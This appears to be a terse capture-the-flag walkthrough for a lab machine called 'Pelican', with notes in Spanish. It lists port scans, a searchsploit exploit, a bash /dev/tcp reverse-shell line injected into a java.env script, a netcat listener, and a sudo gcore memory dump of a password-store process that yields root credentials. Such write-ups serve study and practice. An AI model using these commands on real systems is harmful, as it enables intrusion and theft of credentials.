nmap -A -p- -oA pelican 192.168.198.98 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA pelican 192.168.198.98

nmap -sU -O -p- -oA pelican-udp 192.168.198.98

nikto -h 192.168.198.98:80

Pasted image 20211101104743.png

Pasted image 20211101105123.png

http://192.168.198.98:8081

whatweb https://192.168.198.98:8081

Pasted image 20211101105233.png

searchsploit -m 48654

Pasted image 20211101105436.png

$(bash -i >& /dev/tcp/192.168.49.198/443 0>&1)

Intrroducimos esa linea en java.env script Le damos click a Commit

nc -lvnp 443

Pasted image 20211101110229.png

cat /home/charles/local.txt

Pasted image 20211101110406.png

sudo -l

ps -ef | grep password-store

Pasted image 20211101110541.png

sudo gcore 493

Pasted image 20211101110727.png

Vemos las credenciales

Pasted image 20211101110812.png

su

cat /root/proof.txt

Pasted image 20211101110921.png

boxes

copyright©2022 Cu3rv0x all rights reserved